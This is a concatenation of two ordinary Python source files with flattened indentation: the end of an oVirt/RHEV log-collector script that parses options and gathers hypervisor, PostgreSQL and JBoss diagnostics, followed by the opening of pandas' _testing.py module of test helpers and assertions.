host_list.sort(key=get_host)
fmt = "%-20s | %-20s | %s"
print "Host list (datacenter=%(datacenter)s, cluster=%(cluster)s, host=%(host_pattern)s):" % self.conf
print fmt % ("Data Center", "Cluster", "Hostname/IP Address")
print "\n".join(fmt % (dc, cluster, host) for dc, cluster, host in host_list)
def get_hypervisor_data(self):
hosts = self.conf.get("hosts")
if hosts:
if not self.conf.get("quiet"):
continue_ = get_from_prompt(
msg="About to collect information from %d hypervisors. Continue? (Y/n): " % len(hosts),
default='y')
if continue_ not in ('y', 'Y'):
logging.info("Aborting hypervisor collection...")
return
logging.info("Gathering information from selected hypervisors...")
max_connections = self.conf.get("max_connections", 10)
import threading
from collections import deque
# max_connections may be defined as a string via a .rc file
sem = threading.Semaphore(int(max_connections))
time_diff_queue = deque()
threads = []
for datacenter, cluster, host in hosts:
sem.acquire(True)
collector = HyperVisorData(host.strip(),
configuration=self.conf,
semaphore=sem,
queue=time_diff_queue)
thread = threading.Thread(target=collector.run)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
self.write_time_diff(time_diff_queue)
def get_postgres_data(self):
if self.conf.get("no_postgresql") == False:
try:
try:
self.conf.getpass("pg_pass", msg="password for the PostgreSQL user, %s, to dump the %s PostgreSQL database instance" %
(self.conf.get('pg_user'),
self.conf.get('pg_dbname')))
logging.info("Gathering PostgreSQL the oVirt Engine database and log files from %s..." % (self.conf.get("pg_dbhost")))
except Configuration.SkipException:
logging.info("PostgreSQL oVirt Engine database will not be collected.")
logging.info("Gathering PostgreSQL log files from %s..." % (self.conf.get("pg_dbhost")))
collector = PostgresData(self.conf.get("pg_dbhost"),
configuration=self.conf)
collector.sosreport()
except Exception, e:
ExitCodes.exit_code=ExitCodes.WARN
logging.error("Could not collect PostgreSQL information: %s" % e)
else:
ExitCodes.exit_code=ExitCodes.NOERR
logging.info("Skipping postgresql collection...")
def get_engine_data(self):
logging.info("Gathering oVirt Engine information...")
if self.conf.get("enable_jmx"):
try:
self.conf.getpass("jboss.pass", msg="password for the JBoss JMX user")
except Configuration.SkipException:
logging.info("JBoss JMX information will not be collected because the JMX user's password was not supplied.")
collector = ENGINEData("localhost",
configuration=self.conf)
stdout = collector.sosreport()
logging.info(stdout)
def parse_password(option, opt_str, value, parser):
value = getpass.getpass("Please enter %s: " % (option.help))
setattr(parser.values, option.dest, value)
if __name__ == '__main__':
def comma_separated_list(option, opt_str, value, parser):
setattr(parser.values, option.dest, [v.strip() for v in value.split(",")])
usage_string = "\n".join(("Usage: %prog [options] list",
" %prog [options] collect"))
epilog_string = """\nReturn values:
0: The program ran to completion with no errors.
1: The program encountered a critical failure and stopped.
2: The program encountered a problem gathering data but was able to continue.
"""
OptionParser.format_epilog = lambda self, formatter: self.epilog
parser = OptionParser(usage_string,
version="Version " + versionNum,
epilog=epilog_string)
parser.add_option("", "--conf-file", dest="conf_file",
help="path to configuration file (default=%s)" % DEFAULT_CONFIGURATION_FILE,
metavar="PATH")
parser.add_option("", "--local-tmp", dest="local_tmp_dir",
help="directory to copy reports to locally (default=%s)" % DEFAULT_SCRATCH_DIR, metavar="PATH",
default=DEFAULT_SCRATCH_DIR)
parser.add_option("", "--ticket-number", dest="ticket_number",
help="ticket number to pass with the sosreport",
metavar="TICKET")
parser.add_option("", "--upload", dest="upload",
help="Upload the report to Red Hat (use exclusively if advised from a Red Hat support representative).",
metavar="FTP_SERVER")
parser.add_option("", "--quiet", dest="quiet",
action="store_true", default=False,
help="reduce console output (default=False)")
parser.add_option("", "--log-file",
dest="log_file",
help="path to log file (default=%s)" % DEFAULT_LOG_FILE,
metavar="PATH",
default=DEFAULT_LOG_FILE)
parser.add_option("-v", "--verbose", dest="verbose",
action="store_true", default=False)
engine_group = OptionGroup(parser,
"oVirt Engine Configuration",
"""The options in the oVirt Engine configuration group can be used to filter log collection from one or more RHEV-H.
If the --no-hypervisors option is specified, data is not collected from any RHEV-H.""")
engine_group.add_option("", "--no-hypervisors",
help="skip collection from hypervisors (default=False)",
dest="no_hypervisor",
action="store_true",
default=False)
engine_group.add_option("-u", "--user", dest="user",
help="username to use with the REST API. This should be in UPN format.",
metavar="user@engine.example.com")
engine_group.add_option("-p",
"--passwd",
dest="passwd",
help=SUPPRESS_HELP)
engine_group.add_option("-r", "--engine", dest="engine", metavar="engine.example.com",
help="hostname or IP address of the oVirt Engine (default=localhost:8443)",
default="localhost:8443")
engine_group.add_option("-c", "--cluster", dest="cluster",
help="pattern, or comma separated list of patterns to filter the host list by cluster name (default=None)",
action="callback",
callback=comma_separated_list,
type="string",
default=None, metavar="CLUSTER")
engine_group.add_option("-d", "--data-center", dest="datacenter",
help="pattern, or comma separated list of patterns to filter the host list by data center name (default=None)",
action="callback",
callback=comma_separated_list,
type="string",
default=None, metavar="DATACENTER")
engine_group.add_option("-H", "--hosts", dest="hosts_list", action="callback",
callback=comma_separated_list,
type="string",
help="""comma separated list of hostnames, hostname patterns, FQDNs, FQDN patterns,
IP addresses, or IP address patterns from which the log collector should collect RHEV-H logs (default=None)""")
ssh_group = OptionGroup(parser, "SSH Configuration",
"""The options in the SSH configuration group can be used to specify the maximum
number of concurrent SSH connections to RHEV-H(s) for log collection, the
SSH port, and a identity file to be used.""")
ssh_group.add_option("", "--ssh-port", dest="ssh_port",
help="the port to ssh and scp on", metavar="PORT",
default=22)
ssh_group.add_option("-k", "--key-file", dest="key_file",
help="""the identity file (private key) to be used for accessing the RHEV-Hs (default=%s).
If a identity file is not supplied the program will prompt for a password. It is strongly recommended to
use key based authentication with SSH because the program may make multiple SSH connections
resulting in multiple requests for the SSH password.""" % DEFAULT_SSH_KEY,
metavar="KEYFILE",
default=DEFAULT_SSH_KEY)
ssh_group.add_option("", "--max-connections", dest="max_connections",
help="max concurrent connections for fetching RHEV-H logs (default = 10)",
default=10)
db_group = OptionGroup(parser, "PostgreSQL Database Configuration",
"""The log collector will connect to the oVirt Engine PostgreSQL database and dump the data
for inclusion in the log report unless --no-postgresql is specified. The PostgreSQL user ID and database
name can be specified if they are different from the defaults. If the PostgreSQL database
is not on the localhost set pg-dbhost, provide a pg-ssh-user, and optionally supply pg-host-key and the log collector
will gather remote PostgreSQL logs. The PostgreSQL SOS plug-in must be installed on pg-dbhost for
successful remote log collection.""")
db_group.add_option("", "--no-postgresql", dest="no_postgresql",
help="This option causes the tool to skip the postgresql collection (default=false)",
action="store_true",
default=False)
db_group.add_option("", "--pg-user", dest="pg_user",
help="PostgreSQL database user name (default=postgres)",
metavar="postgres",
default="postgres")
db_group.add_option("",
"--pg-pass",
dest="pg_pass",
help=SUPPRESS_HELP)
db_group.add_option("", "--pg-dbname", dest="pg_dbname",
help="PostgreSQL database name (default=engine)",
metavar="engine",
default="engine")
db_group.add_option("", "--pg-dbhost", dest="pg_dbhost",
help="PostgreSQL database hostname or IP address (default=localhost)",
metavar="localhost",
default="localhost")
db_group.add_option("", "--pg-ssh-user", dest="pg_ssh_user",
help="""the SSH user that will be used to connect to the
server upon which the remote PostgreSQL database lives. (default=root)""",
metavar="root",
default='root')
db_group.add_option("", "--pg-host-key", dest="pg_host_key",
help="""the identity file (private key) to be used for accessing the host
upon which the PostgreSQL database lives (default=not needed if using localhost)""",
metavar="none")
jboss_group = OptionGroup(parser,
"SOSReport Options",
"""The JBoss SOS plug-in will always be executed. To activate data collection
from JBoss's JMX console enable-jmx, java-home, jboss-user, and jboss-pass must
also be specified. If no jboss-pass is supplied in the configuration file then
it will be asked for prior to collection time.""")
jboss_group.add_option("", "--jboss-home", dest="jboss.home",
help="JBoss's installation dir (default=/var/lib/jbossas)",
metavar="/path/to/jbossas",
default="/var/lib/jbossas")
jboss_group.add_option("", "--java-home", dest="jboss.javahome",
help="Java's installation dir (default=/usr/lib/jvm/java)",
metavar="/path/to/java",
default="/usr/lib/jvm/java")
jboss_group.add_option("", "--jboss-profile",
dest="jboss.profile",
action="callback",
type="string",
help="comma separated list of server profiles to limit collection (default='engine-slimmed')",
callback=comma_separated_list,
metavar="PROFILE1, PROFILE2",
default="engine-slimmed")
jboss_group.add_option("", "--enable-jmx", dest="enable_jmx",
help="Enable the collection of run-time metrics from the oVirt Engine JBoss JMX interface",
action="store_true",
default=False)
jboss_group.add_option("", "--jboss-user", dest="jboss.user",
help="JBoss JMX username (default=admin)",
metavar="admin",
default="admin")
jboss_group.add_option("",
"--jboss-pass",
dest="jboss.pass",
help=SUPPRESS_HELP)
jboss_group.add_option("", "--jboss-logsize", dest="jboss.logsize",
help="max size (MiB) to collect per log file (default=15)",
metavar="15",
default=15)
jboss_group.add_option("", "--jboss-stdjar", dest="jboss.stdjar",
metavar="on or off",
help="collect jar statistics for JBoss standard jars.(default=on)")
jboss_group.add_option("", "--jboss-servjar", dest="jboss.servjar",
metavar="on or off",
help="collect jar statistics from any server configuration dirs (default=on)")
jboss_group.add_option("", "--jboss-twiddle", dest="jboss.twiddle",
metavar="on or off",
help="collect twiddle data (default=on)")
jboss_group.add_option("", "--jboss-appxml",
dest="jboss.appxml",
action="callback",
type="string",
callback=comma_separated_list,
help="""comma separated list of application's whose XML descriptors you want (default=all)""",
metavar="APP, APP2",
default="all")
parser.add_option_group(engine_group)
parser.add_option_group(jboss_group)
parser.add_option_group(ssh_group)
parser.add_option_group(db_group)
try:
conf = Configuration(parser)
collector = LogCollector(conf)
# We must ensure that the working directory exits before
# we start doing anything.
if os.path.exists(conf["local_tmp_dir"]):
if not os.path.isdir(conf["local_tmp_dir"]):
raise Exception('%s is not a directory.' % (conf["local_tmp_dir"]))
else:
logging.info("%s does not exist. It will be created." % (conf["local_tmp_dir"]))
os.makedirs(conf["local_tmp_dir"])
# We need to make a temporary scratch directory wherein
# all of the output from VDSM and PostgreSQL SOS plug-ins
# will be dumped. The contents of this directory will be scooped
# up by the oVirt Engine SOS plug-in via the engine.vdsmlogs option
# and included in a single .xz file.
conf["local_scratch_dir"] = os.path.join(conf["local_tmp_dir"], 'RHEVH-and-PostgreSQL-reports')
if not os.path.exists(conf["local_scratch_dir"]):
os.makedirs(conf["local_scratch_dir"])
else:
if len(os.listdir(conf["local_scratch_dir"])) != 0:
raise Exception("""the scratch directory for temporary storage of RHEVH reports is not empty.
It should be empty so that reports from a prior invocation of the log collector are not collected again.
The directory is: %s'""" % (conf["local_scratch_dir"]))
if conf.command == "collect":
if not conf.get("no_hypervisor"):
if collector.set_hosts():
collector.get_hypervisor_data()
else:
logging.info("No hypervisors were selected, therefore no hypervisor data will be collected.")
else:
logging.info("Skipping hypervisor collection...")
collector.get_postgres_data()
collector.get_engine_data()
elif conf.command == "list":
if collector.set_hosts():
collector.list_hosts()
else:
logging.info("No hypervisors were found, therefore no hypervisor data will be listed.")
# Clean up the temp directory
shutil.rmtree(conf["local_scratch_dir"])
except KeyboardInterrupt, k:
print "Exiting on user cancel."
except Exception, e:
multilog(logging.error, e)
print "Use the -h option to see usage."
logging.debug("Configuration:")
try:
logging.debug("command: %s" % conf.command)
#multilog(logging.debug, pprint.pformat(conf))
except:
pass
multilog(logging.debug, traceback.format_exc())
sys.exit(ExitCodes.CRITICAL)
sys.exit(ExitCodes.exit_code)
|
_testing.py
|
import bz2
from collections import Counter
from contextlib import contextmanager
from datetime import datetime
from functools import wraps
import gzip
import operator
import os
import re
from shutil import rmtree
import string
import tempfile
from typing import Any, Callable, ContextManager, List, Optional, Type, Union, cast
import warnings
import zipfile
import numpy as np
from numpy.random import rand, randn
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._libs.lib import no_default
import pandas._libs.testing as _testing
from pandas._typing import Dtype, FilePathOrBuffer, FrameOrSeries
from pandas.compat import get_lzma_file, import_lzma
from pandas.core.dtypes.common import (
is_bool,
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_extension_array_dtype,
is_interval_dtype,
is_number,
is_numeric_dtype,
is_period_dtype,
is_sequence,
is_timedelta64_dtype,
needs_i8_conversion,
)
from pandas.core.dtypes.missing import array_equivalent
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas.core.algorithms import take_1d
from pandas.core.arrays import (
DatetimeArray,
ExtensionArray,
IntervalArray,
PeriodArray,
TimedeltaArray,
period_array,
)
from pandas.core.arrays.datetimelike import DatetimeLikeArrayMixin
from pandas.io.common import urlopen
from pandas.io.formats.printing import pprint_thing
lzma = import_lzma()
_N = 30
_K = 4
_RAISE_NETWORK_ERROR_DEFAULT = False
UNSIGNED_INT_DTYPES: List[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_EA_INT_DTYPES: List[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_DTYPES: List[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_EA_INT_DTYPES: List[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_DTYPES = UNSIGNED_INT_DTYPES + SIGNED_INT_DTYPES
ALL_EA_INT_DTYPES = UNSIGNED_EA_INT_DTYPES + SIGNED_EA_INT_DTYPES
FLOAT_DTYPES: List[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: List[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: List[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: List[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: List[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: List[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES = [bool, "bool"]
BYTES_DTYPES = [bytes, "bytes"]
OBJECT_DTYPES = [object, "object"]
ALL_REAL_DTYPES = FLOAT_DTYPES + ALL_INT_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA]
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
# pandas\_testing.py:119: error: Argument 2 to "simplefilter" has
# incompatible type "Tuple[Type[DeprecationWarning],
# Type[ResourceWarning]]"; expected "Type[Warning]"
warnings.simplefilter(
"always", _testing_mode_warnings # type: ignore[arg-type]
)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
# pandas\_testing.py:126: error: Argument 2 to "simplefilter" has
# incompatible type "Tuple[Type[DeprecationWarning],
# Type[ResourceWarning]]"; expected "Type[Warning]"
warnings.simplefilter(
"ignore", _testing_mode_warnings # type: ignore[arg-type]
)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
def round_trip_pickle(
obj: Any, path: Optional[FilePathOrBuffer] = None
) -> FrameOrSeries:
"""
Pickle an object and then read it again.
Parameters
----------
obj : any object
The object to pickle and then re-read.
path : str, path object or file-like object, default None
The path where the pickled object is written and then read.
Returns
-------
pandas object
The original object that was pickled and then re-read.
"""
_path = path
if _path is None:
_path = f"__{rands(10)}__.pickle"
with ensure_clean(_path) as temp_path:
pd.to_pickle(obj, temp_path)
return pd.read_pickle(temp_path)
def round_trip_pathlib(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a pathlib.Path and read it back
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
Path = pytest.importorskip("pathlib").Path
if path is None:
path = "___pathlib___"
with ensure_clean(path) as path:
writer(Path(path))
obj = reader(Path(path))
return obj
def round_trip_localpath(writer, reader, path: Optional[str] = None):
"""
Write an object to file specified by a py.path LocalPath and read it back.
Parameters
----------
writer : callable bound to pandas object
IO writing function (e.g. DataFrame.to_csv )
reader : callable
IO reading function (e.g. pd.read_csv )
path : str, default None
The path where the object is written and then read.
Returns
-------
pandas object
The original object that was serialized and then re-read.
"""
import pytest
LocalPath = pytest.importorskip("py.path").local
if path is None:
path = "___localpath___"
with ensure_clean(path) as path:
writer(LocalPath(path))
obj = reader(LocalPath(path))
return obj
@contextmanager
def decompress_file(path, compression):
"""
Open a compressed file and return a file object.
Parameters
----------
path : str
The path where the file is read from.
compression : {'gzip', 'bz2', 'zip', 'xz', None}
Name of the decompression to use
Returns
-------
file object
"""
if compression is None:
f = open(path, "rb")
elif compression == "gzip":
# pandas\_testing.py:243: error: Incompatible types in assignment
# (expression has type "IO[Any]", variable has type "BinaryIO")
f = gzip.open(path, "rb") # type: ignore[assignment]
elif compression == "bz2":
# pandas\_testing.py:245: error: Incompatible types in assignment
# (expression has type "BZ2File", variable has type "BinaryIO")
f = bz2.BZ2File(path, "rb") # type: ignore[assignment]
elif compression == "xz":
f = get_lzma_file(lzma)(path, "rb")
elif compression == "zip":
zip_file = zipfile.ZipFile(path)
zip_names = zip_file.namelist()
if len(zip_names) == 1:
# pandas\_testing.py:252: error: Incompatible types in assignment
# (expression has type "IO[bytes]", variable has type "BinaryIO")
f = zip_file.open(zip_names.pop()) # type: ignore[assignment]
else:
raise ValueError(f"ZIP file {path} error. Only one file per ZIP.")
else:
raise ValueError(f"Unrecognized compression type: {compression}")
try:
yield f
finally:
f.close()
if compression == "zip":
zip_file.close()
def write_to_compressed(compression, path, data, dest="test"):
"""
Write data to a compressed file.
Parameters
----------
compression : {'gzip', 'bz2', 'zip', 'xz'}
The compression type to use.
path : str
The file path to write the data.
data : str
The data to write.
dest : str, default "test"
The destination file (for ZIP only)
Raises
------
ValueError : An invalid compression value was passed in.
"""
if compression == "zip":
compress_method = zipfile.ZipFile
elif compression == "gzip":
# pandas\_testing.py:288: error: Incompatible types in assignment
# (expression has type "Type[GzipFile]", variable has type
# "Type[ZipFile]")
compress_method = gzip.GzipFile # type: ignore[assignment]
elif compression == "bz2":
# pandas\_testing.py:290: error: Incompatible types in assignment
# (expression has type "Type[BZ2File]", variable has type
# "Type[ZipFile]")
compress_method = bz2.BZ2File # type: ignore[assignment]
elif compression == "xz":
compress_method = get_lzma_file(lzma)
else:
raise ValueError(f"Unrecognized compression type: {compression}")
if compression == "zip":
mode = "w"
args = (dest, data)
method = "writestr"
else:
mode = "wb"
# pandas\_testing.py:302: error: Incompatible types in assignment
# (expression has type "Tuple[Any]", variable has type "Tuple[Any,
# Any]")
args = (data,) # type: ignore[assignment]
method = "write"
with compress_method(path, mode=mode) as f:
getattr(f, method)(*args)
def _get_tol_from_less_precise(check_less_precise: Union[bool, int]) -> float:
"""
Return the tolerance equivalent to the deprecated `check_less_precise`
parameter.
Parameters
----------
check_less_precise : bool or int
Returns
-------
float
Tolerance to be used as relative/absolute tolerance.
Examples
--------
>>> # Using check_less_precise as a bool:
>>> _get_tol_from_less_precise(False)
0.5e-5
>>> _get_tol_from_less_precise(True)
0.5e-3
>>> # Using check_less_precise as an int representing the decimal
>>> # tolerance intended:
>>> _get_tol_from_less_precise(2)
0.5e-2
>>> _get_tol_from_less_precise(8)
0.5e-8
"""
if isinstance(check_less_precise, bool):
if check_less_precise:
# 3-digit tolerance
return 0.5e-3
else:
# 5-digit tolerance
return 0.5e-5
else:
# Equivalent to setting checking_less_precise=<decimals>
return 0.5 * 10 ** -check_less_precise
def assert_almost_equal(
left,
right,
check_dtype: Union[bool, str] = "equiv",
check_less_precise: Union[bool, int] = no_default,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
**kwargs,
):
"""
Check that the left and right objects are approximately equal.
By approximately equal, we refer to objects that are numbers or that
contain numbers which may be equivalent to specific levels of precision.
Parameters
----------
left : object
right : object
check_dtype : bool or {'equiv'}, default 'equiv'
Check dtype if both a and b are the same type. If 'equiv' is passed in,
then `RangeIndex` and `Int64Index` are also considered equivalent
when doing type checking.
check_less_precise : bool or int, default False
Specify comparison precision. 5 digits (False) or 3 digits (True)
after decimal points are compared. If int, then specify the number
of digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
rtol : float, default 1e-5
Relative tolerance.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance.
.. versionadded:: 1.1.0
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
if isinstance(left, pd.Index):
assert_index_equal(
left,
right,
check_exact=False,
exact=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.Series):
assert_series_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(
left,
right,
check_exact=False,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
**kwargs,
)
else:
# Other sequences.
if check_dtype:
if is_number(left) and is_number(right):
# Do not compare numeric classes, like np.float64 and float.
pass
elif is_bool(left) and is_bool(right):
# Do not compare bool classes, like np.bool_ and bool.
pass
else:
if isinstance(left, np.ndarray) or isinstance(right, np.ndarray):
obj = "numpy array"
else:
obj = "Input"
assert_class_equal(left, right, obj=obj)
_testing.assert_almost_equal(
left, right, check_dtype=check_dtype, rtol=rtol, atol=atol, **kwargs
)
def _check_isinstance(left, right, cls):
"""
Helper method for our assert_* methods that ensures that
the two objects being compared have the right type before
proceeding with the comparison.
Parameters
----------
left : The first object being compared.
right : The second object being compared.
cls : The class type to check against.
Raises
------
AssertionError : Either `left` or `right` is not an instance of `cls`.
"""
cls_name = cls.__name__
if not isinstance(left, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(left)} instead"
)
if not isinstance(right, cls):
raise AssertionError(
f"{cls_name} Expected type {cls}, found {type(right)} instead"
)
def assert_dict_equal(left, right, compare_keys: bool = True):
_check_isinstance(left, right, dict)
_testing.assert_dict_equal(left, right, compare_keys=compare_keys)
def randbool(size=(), p: float = 0.5):
return rand(*size) <= p
RANDS_CHARS = np.array(list(string.ascii_letters + string.digits), dtype=(np.str_, 1))
RANDU_CHARS = np.array(
list("".join(map(chr, range(1488, 1488 + 26))) + string.digits),
dtype=(np.unicode_, 1),
)
def rands_array(nchars, size, dtype="O"):
"""
Generate an array of byte strings.
"""
retval = (
np.random.choice(RANDS_CHARS, size=nchars * np.prod(size))
.view((np.str_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def randu_array(nchars, size, dtype="O"):
"""
Generate an array of unicode strings.
"""
retval = (
np.random.choice(RANDU_CHARS, size=nchars * np.prod(size))
.view((np.unicode_, nchars))
.reshape(size)
)
return retval.astype(dtype)
def rands(nchars):
"""
Generate one random byte string.
See `rands_array` if you want to create an array of random strings.
"""
return "".join(np.random.choice(RANDS_CHARS, nchars))
def close(fignum=None):
from matplotlib.pyplot import close as _close, get_fignums
if fignum is None:
for fignum in get_fignums():
_close(fignum)
else:
_close(fignum)
# -----------------------------------------------------------------------------
# contextmanager to ensure the file cleanup
@contextmanager
def ensure_clean(filename=None, return_filelike=False, **kwargs):
"""
Gets a temporary path and agrees to remove on close.
Parameters
----------
filename : str (optional)
if None, creates a temporary file which is then removed when out of
scope. if passed, creates temporary file with filename as ending.
return_filelike : bool (default False)
if True, returns a file-like which is *always* cleaned. Necessary for
savefig and other functions which want to append extensions.
**kwargs
Additional keywords passed in for creating a temporary file.
:meth:`tempFile.TemporaryFile` is used when `return_filelike` is ``True``.
:meth:`tempfile.mkstemp` is used when `return_filelike` is ``False``.
Note that the `filename` parameter will be passed in as the `suffix`
argument to either function.
See Also
--------
tempfile.TemporaryFile
tempfile.mkstemp
"""
filename = filename or ""
fd = None
kwargs["suffix"] = filename
if return_filelike:
f = tempfile.TemporaryFile(**kwargs)
try:
yield f
finally:
f.close()
else:
# Don't generate tempfile if using a path with directory specified.
if len(os.path.dirname(filename)):
raise ValueError("Can't pass a qualified name to ensure_clean()")
try:
fd, filename = tempfile.mkstemp(**kwargs)
except UnicodeEncodeError:
import pytest
pytest.skip("no unicode file names on this system")
try:
yield filename
finally:
try:
os.close(fd)
except OSError:
print(f"Couldn't close file descriptor: {fd} (file: {filename})")
try:
if os.path.exists(filename):
os.remove(filename)
except OSError as e:
print(f"Exception on removing file: {e}")
@contextmanager
def ensure_clean_dir():
"""
Get a temporary directory path and agrees to remove on close.
Yields
------
Temporary directory path
"""
directory_name = tempfile.mkdtemp(suffix="")
try:
yield directory_name
finally:
try:
rmtree(directory_name)
except OSError:
pass
@contextmanager
def ensure_safe_environment_variables():
"""
Get a context manager to safely set environment variables
All changes will be undone on close, hence environment variables set
within this contextmanager will neither persist nor change global state.
"""
saved_environ = dict(os.environ)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def assert_index_equal(
left: Index,
right: Index,
exact: Union[bool, str] = "equiv",
check_names: bool = True,
check_less_precise: Union[bool, int] = no_default,
check_exact: bool = True,
check_categorical: bool = True,
check_order: bool = True,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
obj: str = "Index",
) -> None:
"""
Check that left and right Index are equal.
Parameters
----------
left : Index
right : Index
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
check_names : bool, default True
Whether to check the names attribute.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_order : bool, default True
Whether to compare the order of index entries as well as their values.
If True, both indexes must contain the same elements, in the same order.
If False, both indexes must contain the same elements, but in any order.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
Examples
--------
>>> from pandas.testing import assert_index_equal
>>> a = pd.Index([1, 2, 3])
>>> b = pd.Index([1, 2, 3])
>>> assert_index_equal(a, b)
"""
__tracebackhide__ = True
def _check_types(left, right, obj="Index"):
if exact:
assert_class_equal(left, right, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", left, right, obj=obj)
# allow string-like to have different inferred_types
if left.inferred_type in ("string"):
assert right.inferred_type in ("string")
else:
assert_attr_equal("inferred_type", left, right, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
return unique._shallow_copy(filled, name=index.names[level])
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# If order doesn't matter then sort the index entries
if not check_order:
left = left.sort_values()
right = right.sort_values()
# MultiIndex special comparison for little-friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_exact=check_exact,
rtol=rtol,
atol=atol,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = (
np.sum((left._values != right._values).astype(int)) * 100.0 / len(left)
)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
rtol=rtol,
atol=atol,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
